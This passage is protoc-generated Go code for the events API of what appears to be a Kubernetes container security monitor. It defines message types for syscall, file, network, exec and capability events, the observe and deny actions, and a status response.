func (x *StatusResponse) Reset() {
	*x = StatusResponse{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[11]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *StatusResponse) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*StatusResponse) ProtoMessage() {}

func (x *StatusResponse) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[11]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use StatusResponse.ProtoReflect.Descriptor instead.
func (*StatusResponse) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{11}
}

func (x *StatusResponse) GetNode() string {
	if x != nil {
		return x.Node
	}
	return ""
}

func (x *StatusResponse) GetContainersTracked() int32 {
	if x != nil {
		return x.ContainersTracked
	}
	return 0
}

func (x *StatusResponse) GetContainersLearning() int32 {
	if x != nil {
		return x.ContainersLearning
	}
	return 0
}

func (x *StatusResponse) GetContainersEnforcing() int32 {
	if x != nil {
		return x.ContainersEnforcing
	}
	return 0
}

func (x *StatusResponse) GetSubscribers() int32 {
	if x != nil {
		return x.Subscribers
	}
	return 0
}

func (x *StatusResponse) GetEventsDropped() uint64 {
	if x != nil {
		return x.EventsDropped
	}
	return 0
}

func (x *StatusResponse) GetVersion() string {
	if x != nil {
		return x.Version
	}
	return ""
}

var File_api_v1alpha1_events_proto protoreflect.FileDescriptor

const file_api_v1alpha1_events_proto_rawDesc = "" +
	"\n" +
	"\x19api/v1alpha1/events.proto\x12\x11pahlevan.v1alpha1\"\x99\x01\n" +
	"\x10SubscribeRequest\x122\n" +
	"\x05types\x18\x01 \x03(\x0e2\x1c.pahlevan.v1alpha1.EventTypeR\x05types\x12!\n" +
	"\fdenials_only\x18\x02 \x01(\bR\vdenialsOnly\x12\x1c\n" +
	"\tnamespace\x18\x03 \x01(\tR\tnamespace\x12\x10\n" +
	"\x03pod\x18\x04 \x01(\tR\x03pod\"\xa8\x05\n" +
	"\x05Event\x12\x18\n" +
	"\aversion\x18\x01 \x01(\tR\aversion\x120\n" +
	"\x04type\x18\x02 \x01(\x0e2\x1c.pahlevan.v1alpha1.EventTypeR\x04type\x121\n" +
	"\x06action\x18\x03 \x01(\x0e2\x19.pahlevan.v1alpha1.ActionR\x06action\x12\x1c\n" +
	"\ttimestamp\x18\x04 \x01(\tR\ttimestamp\x12$\n" +
	"\x0ekernel_time_ns\x18\x05 \x01(\x04R\fkernelTimeNs\x12\x1b\n" +
	"\tcgroup_id\x18\x06 \x01(\x04R\bcgroupId\x12\x16\n" +
	"\x06source\x18\a \x01(\tR\x06source\x128\n" +
	"\aprocess\x18\b \x01(\v2\x1e.pahlevan.v1alpha1.ProcessInfoR\aprocess\x12@\n" +
	"\n" +
	"kubernetes\x18\t \x01(\v2 .pahlevan.v1alpha1.KubernetesRefR\n" +
	"kubernetes\x12:\n" +
	"\asyscall\x18\n" +
	" \x01(\v2\x1e.pahlevan.v1alpha1.SyscallInfoH\x00R\asyscall\x121\n" +
	"\x04file\x18\v \x01(\v2\x1b.pahlevan.v1alpha1.FileInfoH\x00R\x04file\x12:\n" +
	"\anetwork\x18\f \x01(\v2\x1e.pahlevan.v1alpha1.NetworkInfoH\x00R\anetwork\x121\n" +
	"\x04exec\x18\r \x01(\v2\x1b.pahlevan.v1alpha1.ExecInfoH\x00R\x04exec\x12C\n" +
	"\n" +
	"capability\x18\x0e \x01(\v2!.pahlevan.v1alpha1.CapabilityInfoH\x00R\n" +
	"capabilityB\b\n" +
	"\x06detail\"\xa0\x01\n" +
	"\vProcessInfo\x12\x10\n" +
	"\x03pid\x18\x01 \x01(\rR\x03pid\x12\x12\n" +
	"\x04tgid\x18\x02 \x01(\rR\x04tgid\x12\x10\n" +
	"\x03uid\x18\x03 \x01(\rR\x03uid\x12\x10\n" +
	"\x03gid\x18\x04 \x01(\rR\x03gid\x12\x12\n" +
	"\x04comm\x18\x05 \x01(\tR\x04comm\x12\x12\n" +
	"\x04ppid\x18\x06 \x01(\rR\x04ppid\x12\x1f\n" +
	"\vparent_comm\x18\a \x01(\tR\n" +
	"parentComm\"\xc5\x03\n" +
	"\rKubernetesRef\x12\x1c\n" +
	"\tnamespace\x18\x01 \x01(\tR\tnamespace\x12\x10\n" +
	"\x03pod\x18\x02 \x01(\tR\x03pod\x12\x1c\n" +
	"\tcontainer\x18\x03 \x01(\tR\tcontainer\x12\x17\n" +
	"\apod_uid\x18\x04 \x01(\tR\x06podUid\x12!\n" +
	"\fcontainer_id\x18\x05 \x01(\tR\vcontainerId\x12\x18\n" +
	"\aruntime\x18\x06 \x01(\tR\aruntime\x12\x1b\n" +
	"\tqos_class\x18\a \x01(\tR\bqosClass\x12\x12\n" +
	"\x04node\x18\b \x01(\tR\x04node\x12#\n" +
	"\rworkload_kind\x18\t \x01(\tR\fworkloadKind\x12#\n" +
	"\rworkload_name\x18\n" +
	" \x01(\tR\fworkloadName\x12D\n" +
	"\x06labels\x18\v \x03(\v2,.pahlevan.v1alpha1.KubernetesRef.LabelsEntryR\x06labels\x12\x14\n" +
	"\x05image\x18\f \x01(\tR\x05image\x1a9\n" +
	"\vLabelsEntry\x12\x10\n" +
	"\x03key\x18\x01 \x01(\tR\x03key\x12\x14\n" +
	"\x05value\x18\x02 \x01(\tR\x05value:\x028\x01\"9\n" +
	"\vSyscallInfo\x12\x16\n" +
	"\x06number\x18\x01 \x01(\x04R\x06number\x12\x12\n" +
	"\x04name\x18\x02 \x01(\tR\x04name\"^\n" +
	"\bFileInfo\x12\x12\n" +
	"\x04path\x18\x01 \x01(\tR\x04path\x12\x14\n" +
	"\x05flags\x18\x02 \x01(\rR\x05flags\x12\x12\n" +
	"\x04mode\x18\x03 \x01(\rR\x04mode\x12\x14\n" +
	"\x05write\x18\x04 \x01(\bR\x05write\"\xe9\x01\n" +
	"\vNetworkInfo\x12%\n" +
	"\x0edestination_ip\x18\x01 \x01(\tR\rdestinationIp\x12)\n" +
	"\x10destination_port\x18\x02 \x01(\rR\x0fdestinationPort\x12\x1a\n" +
	"\bprotocol\x18\x03 \x01(\tR\bprotocol\x12'\n" +
	"\x0fprotocol_number\x18\x04 \x01(\rR\x0eprotocolNumber\x12\x1c\n" +
	"\tdirection\x18\x05 \x01(\tR\tdirection\x12%\n" +
	"\x0eaddress_family\x18\x06 \x01(\tR\raddressFamily\"\xe0\x01\n" +
	"\bExecInfo\x12\x16\n" +
	"\x06binary\x18\x01 \x01(\tR\x06binary\x12\x12\n" +
	"\x04args\x18\x02 \x03(\tR\x04args\x12!\n" +
	"\fcommand_line\x18\x03 \x01(\tR\vcommandLine\x12%\n" +
	"\x0eargs_truncated\x18\x04 \x01(\bR\rargsTruncated\x127\n" +
	"\bancestry\x18\x05 \x03(\v2\x1b.pahlevan.v1alpha1.AncestorR\bancestry\x12%\n" +
	"\x0eancestry_chain\x18\x06 \x01(\tR\rancestryChain\"0\n" +
	"\bAncestor\x12\x10\n" +
	"\x03pid\x18\x01 \x01(\rR\x03pid\x12\x12\n" +
	"\x04comm\x18\x02 \x01(\tR\x04comm\"<\n" +
	"\x0eCapabilityInfo\x12\x16\n" +
	"\x06number\x18\x01 \x01(\rR\x06number\x12\x12\n" +
	"\x04name\x18\x02 \x01(\tR\x04name\"\x0f\n" +
	"\rStatusRequest\"\x9a\x02\n" +
	"\x0eStatusResponse\x12\x12\n" +
	"\x04node\x18\x01 \x01(\tR\x04node\x12-\n" +
	"\x12containers_tracked\x18\x02 \x01(\x05R\x11containersTracked\x12/\n" +
	"\x13containers_learning\x18\x03 \x01(\x05R\x12containersLearning\x121\n" +
	"\x14containers_enforcing\x18\x04 \x01(\x05R\x13containersEnforcing\x12 \n" +
	"\vsubscribers\x18\x05 \x01(\x05R\vsubscribers\x12%\n" +
	"\x0eevents_dropped\x18\x06 \x01(\x04R\reventsDropped\x12\x18\n" +
	"\aversion\x18\a \x01(\tR\aversion*\x9f\x01\n" +
	"\tEventType\x12\x1a\n" +
	"\x16EVENT_TYPE_UNSPECIFIED\x10\x00\x12\x16\n" +
	"\x12EVENT_TYPE_SYSCALL\x10\x01\x12\x13\n" +
	"\x0fEVENT_TYPE_FILE\x10\x02\x12\x16\n" +
	"\x12EVENT_TYPE_NETWORK\x10\x03\x12\x16\n" +
	"\x12EVENT_TYPE_PROCESS\x10\x04\x12\x19\n" +
	"\x15EVENT_TYPE_CAPABILITY\x10\x05*E\n" +
	"\x06Action\x12\x16\n" +
	"\x12ACTION_UNSPECIFIED\x10\x00\x12\x12\n" +
	"\x0eACTION_OBSERVE\x10\x01\x12\x0f\n" +
	"\vACTION_DENY\x10\x022\xae\x01\n" +
	"\fEventService\x12L\n" +
	"\tSubscribe\x12#.pahlevan.v1alpha1.SubscribeRequest\x1a\x18.pahlevan.v1alpha1.Event0\x01\x12P\n" +
	"\tGetStatus\x12 .pahlevan.v1alpha1.StatusRequest\x1a!.pahlevan.v1alpha1.StatusResponseB:Z8github.com/obsernetics/pahlevan/api/v1alpha1;apiv1alpha1b\x06proto3"

var (
	file_api_v1alpha1_events_proto_rawDescOnce sync.Once
	file_api_v1alpha1_events_proto_rawDescData []byte
)

func file_api_v1alpha1_events_proto_rawDescGZIP() []byte {
	file_api_v1alpha1_events_proto_rawDescOnce.Do(func() {
		file_api_v1alpha1_events_proto_rawDescData = protoimpl.X.CompressGZIP(unsafe.Slice(unsafe.StringData(file_api_v1alpha1_events_proto_rawDesc), len(file_api_v1alpha1_events_proto_rawDesc)))
	})
	return file_api_v1alpha1_events_proto_rawDescData
}

var file_api_v1alpha1_events_proto_enumTypes = make([]protoimpl.EnumInfo, 2)
var file_api_v1alpha1_events_proto_msgTypes = make([]protoimpl.MessageInfo, 13)
var file_api_v1alpha1_events_proto_goTypes = []any{
	(EventType)(0),           // 0: pahlevan.v1alpha1.EventType
	(Action)(0),              // 1: pahlevan.v1alpha1.Action
	(*SubscribeRequest)(nil), // 2: pahlevan.v1alpha1.SubscribeRequest
	(*Event)(nil),            // 3: pahlevan.v1alpha1.Event
	(*ProcessInfo)(nil),      // 4: pahlevan.v1alpha1.ProcessInfo
	(*KubernetesRef)(nil),    // 5: pahlevan.v1alpha1.KubernetesRef
	(*SyscallInfo)(nil),      // 6: pahlevan.v1alpha1.SyscallInfo
	(*FileInfo)(nil),         // 7: pahlevan.v1alpha1.FileInfo
	(*NetworkInfo)(nil),      // 8: pahlevan.v1alpha1.NetworkInfo
	(*ExecInfo)(nil),         // 9: pahlevan.v1alpha1.ExecInfo
	(*Ancestor)(nil),         // 10: pahlevan.v1alpha1.Ancestor
	(*CapabilityInfo)(nil),   // 11: pahlevan.v1alpha1.CapabilityInfo
	(*StatusRequest)(nil),    // 12: pahlevan.v1alpha1.StatusRequest
	(*StatusResponse)(nil),   // 13: pahlevan.v1alpha1.StatusResponse
	nil,                      // 14: pahlevan.v1alpha1.KubernetesRef.LabelsEntry
}
var file_api_v1alpha1_events_proto_depIdxs = []int32{
	0,  // 0: pahlevan.v1alpha1.SubscribeRequest.types:type_name -> pahlevan.v1alpha1.EventType
	0,  // 1: pahlevan.v1alpha1.Event.type:type_name -> pahlevan.v1alpha1.EventType
	1,  // 2: pahlevan.v1alpha1.Event.action:type_name -> pahlevan.v1alpha1.Action
	4,  // 3: pahlevan.v1alpha1.Event.process:type_name -> pahlevan.v1alpha1.ProcessInfo
	5,  // 4: pahlevan.v1alpha1.Event.kubernetes:type_name -> pahlevan.v1alpha1.KubernetesRef
	6,  // 5: pahlevan.v1alpha1.Event.syscall:type_name -> pahlevan.v1alpha1.SyscallInfo
	7,  // 6: pahlevan.v1alpha1.Event.file:type_name -> pahlevan.v1alpha1.FileInfo
	8,  // 7: pahlevan.v1alpha1.Event.network:type_name -> pahlevan.v1alpha1.NetworkInfo
	9,  // 8: pahlevan.v1alpha1.Event.exec:type_name -> pahlevan.v1alpha1.ExecInfo
	11, // 9: pahlevan.v1alpha1.Event.capability:type_name -> pahlevan.v1alpha1.CapabilityInfo
	14, // 10: pahlevan.v1alpha1.KubernetesRef.labels:type_name -> pahlevan.v1alpha1.KubernetesRef.LabelsEntry
	10, // 11: pahlevan.v1alpha1.ExecInfo.ancestry:type_name -> pahlevan.v1alpha1.Ancestor
	2,  // 12: pahlevan.v1alpha1.EventService.Subscribe:input_type -> pahlevan.v1alpha1.SubscribeRequest
	12, // 13: pahlevan.v1alpha1.EventService.GetStatus:input_type -> pahlevan.v1alpha1.StatusRequest
	3,  // 14: pahlevan.v1alpha1.EventService.Subscribe:output_type -> pahlevan.v1alpha1.Event
	13, // 15: pahlevan.v1alpha1.EventService.GetStatus:output_type -> pahlevan.v1alpha1.StatusResponse
	14, // [14:16] is the sub-list for method output_type
	12, // [12:14] is the sub-list for method input_type
	12, // [12:12] is the sub-list for extension type_name
	12, // [12:12] is the sub-list for extension extendee
	0,  // [0:12] is the sub-list for field type_name
}

func init() { file_api_v1alpha1_events_proto_init() }
func file_api_v1alpha1_events_proto_init() {
	if File_api_v1alpha1_events_proto != nil {
		return
	}
	file_api_v1alpha1_events_proto_msgTypes[1].OneofWrappers = []any{
		(*Event_Syscall)(nil),
		(*Event_File)(nil),
		(*Event_Network)(nil),
		(*Event_Exec)(nil),
		(*Event_Capability)(nil),
	}
	type x struct{}
	out := protoimpl.TypeBuilder{
		File: protoimpl.DescBuilder{
			GoPackagePath: reflect.TypeOf(x{}).PkgPath(),
			RawDescriptor: unsafe.Slice(unsafe.StringData(file_api_v1alpha1_events_proto_rawDesc), len(file_api_v1alpha1_events_proto_rawDesc)),
			NumEnums:      2,
			NumMessages:   13,
			NumExtensions: 0,
			NumServices:   1,
		},
		GoTypes:           file_api_v1alpha1_events_proto_goTypes,
		DependencyIndexes: file_api_v1alpha1_events_proto_depIdxs,
		EnumInfos:         file_api_v1alpha1_events_proto_enumTypes,
		MessageInfos:      file_api_v1alpha1_events_proto_msgTypes,
	}.Build()
	File_api_v1alpha1_events_proto = out.File
	file_api_v1alpha1_events_proto_goTypes = nil
	file_api_v1alpha1_events_proto_depIdxs = nil
}
